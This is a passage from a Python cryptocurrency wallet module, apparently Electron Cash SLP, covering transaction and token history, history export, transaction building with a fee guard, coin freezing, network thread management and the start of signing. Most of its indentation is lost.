s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def get_slp_history(self, domain=None, validities_considered=(None,0,1)):
history = []
histories = self.get_slp_histories(domain=domain, validities_considered=validities_considered)
# Take separate token histories and flatten them, then sort them.
for token_id,t_history in histories.items():
for tx_hash, height, conf, timestamp, delta in t_history:
history.append((tx_hash, height, conf, timestamp, delta, token_id))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
return history
def get_slp_histories(self, domain=None, validities_considered=(0,1)):
# Based on get_history.
# We return a dict of histories, one history per token_id.
# get domain
if domain is None:
domain = self.get_addresses()
#1. Big iteration to find all deltas and put them in the right place.
token_tx_deltas = defaultdict(lambda: defaultdict(int)) # defaultdict of defaultdicts of ints :)
for addr in domain:
h = self.get_address_history(addr)
with self.lock:
addrslptxo = self._slp_txo[addr]
for tx_hash, height in h:
if tx_hash in self.pruned_txo.values():
continue
tti = self.tx_tokinfo.get(tx_hash)
if tti and tti['validity'] in validities_considered:
txdict = addrslptxo.get(tx_hash,{})
for idx,d in txdict.items():
if isinstance(d['qty'],int):
token_tx_deltas[d['token_id']][tx_hash] += d['qty'] # received!
# scan over all txi's, trying to find if they were tokens, which tokens, and how much
# (note that non-SLP txes can spend (burn) SLP --- and SLP of tokenA can burn tokenB)
for n, _ in self.txi.get(tx_hash, {}).get(addr, ()):
prevtxid, prevout_str = n.rsplit(':',1)
tti = self.tx_tokinfo.get(prevtxid)
if not (tti and tti['validity'] in validities_considered):
continue
prevout = int(prevout_str)
d = addrslptxo.get(prevtxid,{}).get(prevout,{})
if isinstance(d.get('qty',None),int):
token_tx_deltas[d['token_id']][tx_hash] -= d['qty'] # spent!
# 2. create history (no sorting needed since balances won't be computed)
histories = {}
for token_id, tx_deltas in token_tx_deltas.items():
history = histories[token_id] = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
# 3. At this point we could compute running balances, but let's not.
return histories
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
TxHistory = namedtuple("TxHistory", "tx_hash, height, conf, timestamp, amount, balance")
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append(self.TxHistory(tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab bch history
h = self.get_history(domain, reverse=True)
out = []
# grab slp history
_slp_h = self.get_slp_history(domain=domain, validities_considered=(None,0,1,2,3,4))
def fmt_slp_amt(v, decimals):
if v is None:
return '--'
if decimals == "?":
decimals = 0
return format_satoshis(v, decimal_point=int(decimals), is_diff=True)
def get_token_info(token_id):
return self.token_types.get(token_id, {
'class': '?',
'decimals': 0,
'name': 'unknown'
})
slp_h = dict((tx_hash, { \
'value': fmt_slp_amt(delta, get_token_info(token_id)['decimals']), \
'token_id': token_id, \
'name': get_token_info(token_id)['name'] \
}) for tx_hash, _, _, _, delta, token_id in _slp_h)
def get_slp_tx(tx_hash):
if slp_h.get(tx_hash) is None:
return { 'value': '--', 'name': '--', 'token_id': '--' }
return slp_h.get(tx_hash)
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
slp_info = get_slp_tx(tx_hash)
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
'slp_value' : slp_info['value'],
'slp_name' : slp_info['name'],
'slp_token_id' : slp_info['token_id']
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
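# Returns (status, status_str): 'status' is a small integer, used as an index
# into TX_STATUS when < 4 (the various unconfirmed states); confirmed txs get
# 3 + min(conf, 6) and the formatted timestamp is shown as the status string.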
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def check_sufficient_slp_balance(self, slpMessage, config):
if self.is_slp:
if slpMessage.transaction_type == 'SEND':
total_token_out = sum(slpMessage.op_return_fields['token_output'])
valid_token_balance, _, _, valid_unfrozen_token_balance, _ = self.get_slp_token_balance(slpMessage.op_return_fields['token_id_hex'], config)
if total_token_out > valid_token_balance:
raise NotEnoughFundsSlp()
elif total_token_out > valid_unfrozen_token_balance:
raise NotEnoughUnfrozenFundsSlp()
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None, *, mandatory_coins=[]):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
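# Convention: an output whose value is the string '!' means "send the maximum
# available amount to this output"; at most one such output is allowed and its
# final amount is computed after fee estimation below.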
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
for item in mandatory_coins:
self.add_input_info(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [self.get_addresses()[0]]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr,
mandatory_coins=mandatory_coins)
else:
inputs = mandatory_coins + inputs
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 50):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
if not mandatory_coins:
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def make_unsigned_transaction_for_bitcoinfiles(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info_for_bitcoinfiles(item)
# change address
if change_addr:
change_addrs = [change_addr]
else:
addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if self.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.get_num_tx(addr) == 0]
if not change_addrs:
change_addrs = [random.choice(addrs)]
else:
change_addrs = [inputs[0]['address']]
assert all(isinstance(addr, Address) for addr in change_addrs)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
max_change = self.max_change_outputs if self.multiple_change else 1
coin_chooser = coinchooser.CoinChooserPrivacy()
# determine if this transaction should utilize all available inputs
tx = coin_chooser.make_tx(inputs, outputs, change_addrs[:max_change],
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
        tx_in_bytes = tx.estimated_size()
        fee_in_satoshis = tx.get_fee()
        sats_per_byte = fee_in_satoshis / tx_in_bytes
        if sats_per_byte > 50:
            raise ExcessiveFee()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
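    # Hedged usage sketch (illustrative only): is_frozen_coin() accepts a
    # single "prevout_hash:n" string, a coin dict as returned by get_utxos(),
    # or a set of such strings (in which case the frozen subset is returned).
    #
    #   name = "{}:{}".format(prevout_hash, 0)      # prevout_hash: hypothetical txid
    #   wallet.is_frozen_coin(name)                 # -> bool
    #   wallet.is_frozen_coin({name, other_name})   # -> set of the frozen members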
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
        doesn't get saved to storage. This mechanism was added so that plugins
        (such as CashFusion) have a way to do ephemeral coin freezing that
        doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
        call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
                # Note: we could do an is_mine check for each coin dict here,
# but since all code paths leading to this branch always pass valid
# coins that are "mine", we removed the check to save CPU cycles.
#
# So an O(M logN) algorithm becomes O(M) without the is_mine check,
# where M = number of coins and N = number of addresses.
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
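    # Hedged usage sketch (illustrative only): freezing with temporary=True
    # only touches the in-memory set (frozen_coins_tmp) and is never written
    # to storage; unfreezing removes the coin from both the temporary and the
    # persistent sets.
    #
    #   wallet.set_frozen_coin_state([name], True, temporary=True)
    #   wallet.set_frozen_coin_state([name], False)   # clears it from both sets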
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def _slp_callback_on_status(self, event, *args):
if self.is_slp and args[0] == 'connected':
self.activate_slp()
def start_threads(self, network):
self.network = network
if self.network:
if self.is_slp:
# Note: it's important that SLP data structures are defined
# before the network (SPV/Synchronizer) callbacks are installed
# otherwise we may receive a tx from the network thread
# before SLP objects are properly constructed.
self.slp_graph_0x01 = slp_validator_0x01.shared_context
self.slp_graph_0x01_nft = slp_validator_0x01_nft1.shared_context_nft1
self.activate_slp()
self.network.register_callback(self._slp_callback_on_status, ['status'])
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
            self.cashacct.start(self.network)  # start cashacct network-dependent subsystem, network.add_jobs, etc.
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
            # Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
            # because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
            # Now no references to the synchronizer or verifier
            # remain, so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
                break  # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
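    # Hedged usage sketch (illustrative only): cpfp() builds a child transaction
    # that spends one of our own outputs of `parent_tx` back to the same address
    # minus `child_fee`, bumping the effective fee rate of the parent+child pair.
    # `parent_tx`, `child_fee` and `password` are hypothetical here.
    #
    #   child = wallet.cpfp(parent_tx, child_fee)
    #   if child is not None:
    #       wallet.sign_transaction(child, password)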
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if not x_pubkey[0:2] in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
